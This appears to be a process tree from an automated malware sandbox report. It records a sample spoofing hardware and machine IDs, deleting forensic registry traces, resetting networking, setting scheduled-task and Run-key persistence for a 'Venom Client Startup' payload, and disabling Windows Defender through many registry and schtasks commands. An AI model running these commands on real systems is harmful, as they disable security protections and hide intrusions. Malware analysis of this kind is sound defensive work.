C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d Apple-23065-5028-3255923232 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d Apple-23065-5028-3255923232 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d Apple-23065-5028-3255923232 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\MountedDevices /f3⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\MountedDevices /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f3⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f3⤵
-
C:\Windows\system32\reg.exereg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f3⤵
-
C:\Windows\system32\reg.exereg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f3⤵
-
C:\Windows\system32\reg.exereg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f3⤵
-
C:\Windows\system32\reg.exereg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Classes\Interface /v ClsidStore /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\Interface /v ClsidStore /t REG_BINARY /d 230655028325592323231078962429702342331316296021782623189 /f4⤵
- Modifies registry class
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d Apple-23065-5028-3255923232 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d Apple-23065-5028-3255923232 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d Apple-23065-5028-3255923232 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Classes\Interface /v ClsidStore /f3⤵
-
C:\Windows\system32\reg.exereg delete HKCU\Software\Classes\Interface /v ClsidStore /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v _DriverProviderInfo /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v _DriverProviderInfo /t REG_SZ /d Apple-23069-15776-1765514527 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d Apple-23069-15776-1765514527 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SettingsRequests /f3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v BackupProductKeyDefault /f3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v actionlist /f3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f3⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist /f3⤵
-
C:\Windows\system32\reg.exereg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Hex-Rays\IDA\History /f3⤵
-
C:\Windows\system32\reg.exereg delete HKCU\Software\Hex-Rays\IDA\History /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Hex-Rays\IDA\History64 /f3⤵
-
C:\Windows\system32\reg.exereg delete HKCU\Software\Hex-Rays\IDA\History64 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f3⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\TimeZoneInformation /f3⤵
-
C:\Windows\system32\reg.exereg delete HKLM\System\CurrentControlSet\Control\TimeZoneInformation /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f3⤵
-
C:\Windows\system32\reg.exereg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\Nsi\{eb004a03-9b1a-11d4-9123-0050047759bc}\3 /f3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\WMI\Security\e5cdf199-abfd-11ea-8f7e-a8be27d3e473 /f3⤵
-
C:\Windows\system32\reg.exereg delete HKLM\System\CurrentControlSet\Control\WMI\Security\e5cdf199-abfd-11ea-8f7e-a8be27d3e473 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\WMI\Security\8c416c79-d49b-4f01-a467-e56d3aa8234c /f3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\WMI\Security\e5cdf199-abfd-11ea-8f7e-a8be27d3e473 /f3⤵
-
C:\Windows\system32\reg.exereg delete HKLM\System\CurrentControlSet\Control\WMI\Security\e5cdf199-abfd-11ea-8f7e-a8be27d3e473 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Compatibility32\FortniteLauncher /f3⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Compatibility32\FortniteLauncher /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d 230691577617655145278624135504749615060234541767923233 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Classes\Installer\Dependencies /v MSICache /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\Installer\Dependencies /v MSICache /t REG_BINARY /d 2307226524275158221893917477315930337315721730617531 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TPM\WMI /v WindowsAIKHash /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Services\TPM\WMI /v WindowsAIKHash /t REG_BINARY /d 23072265242751582218939174773159303373157217306 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientIdValidation /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientIdValidation /t REG_BINARY /d 230722652427515822189391747731593033731572173061753123277 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKCU\SYSTEM\CurrentControlSet\Services\TPM\ODUID /v RandomSeed /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKCU\SYSTEM\CurrentControlSet\Services\TPM\ODUID /v RandomSeed /t REG_BINARY /d 230722652427515822189391747731593033731572173061753123277 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Internet" "Explorer\Migration /v IE" "Installed" "Date /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Internet" "Explorer\Migration /v IE" "Installed" "Date /t REG_BINARY /d 230722652427515822189391747731593033731572 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d %random%%random%%random% /f3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d %random%%random%%random% /f3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d %random%%random%%random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d 23072265242751 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SevilleEventlogManager /v LastEventlogWrittenTime /t REG_QWORD /d %random%%random%%random% /f3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d 230722652427515822189391747731593033731572173061753123277 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Control\ProductOptions /v OSProductPfn /t REG_SZ /d Microsoft.Windows.%random%.%random%-%random%_%random%%random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\System\CurrentControlSet\Control\ProductOptions /v OSProductPfn /t REG_SZ /d Microsoft.Windows.23072.26524-2751_582218939 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Control\ProductOptions /v OSProductContentId /t REG_SZ /d {%random%-%random%-%random%-%random%} /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\System\CurrentControlSet\Control\ProductOptions /v OSProductContentId /t REG_SZ /d {23072-26524-2751-5822} /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Microsoft\Direct3D /v WHQLClass /f3⤵
-
C:\Windows\system32\reg.exereg delete HKCU\Software\Microsoft\Direct3D /v WHQLClass /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User" "Shell" "Folders /v History /f3⤵
-
C:\Windows\system32\reg.exereg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User" "Shell" "Folders /v History /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Internet" "Settings\5.0\Cache /f3⤵
-
C:\Windows\system32\reg.exereg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Internet" "Settings\5.0\Cache /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh winsock reset3⤵
-
C:\Windows\system32\netsh.exenetsh winsock reset4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh int ip reset3⤵
-
C:\Windows\system32\netsh.exenetsh int ip reset4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall reset3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns3⤵
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns4⤵
- Gathers network information
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /release3⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release4⤵
- Gathers network information
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /renew3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c arp -d3⤵
-
C:\Windows\system32\ARP.EXEarp -d4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh interface ip delete arpcache3⤵
-
C:\Windows\system32\netsh.exenetsh interface ip delete arpcache4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start C:\Windows\IME\networkclean.exe3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c %systemdrive%\Windows\IME\adapters.exe3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Gptmvmjkvvg.exe"C:\Users\Admin\AppData\Local\Temp\Gptmvmjkvvg.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Venom Client Startup" /sc ONLOGON /tr "C:\Windows\SysWOW64\Images.exe" /rl HIGHEST /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Venom Client Startup" /sc ONLOGON /tr "C:\Windows\SysWOW64\Images.exe" /rl HIGHEST /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe" C:\Users\Admin\AppData\Local\Execution.vbs4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution2.vbs"4⤵
- Adds Run key to start application
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution5.vbs"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" / t REG_DWORD /d "0" /f4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Command and Scripting Interpreter: PowerShell
-
-
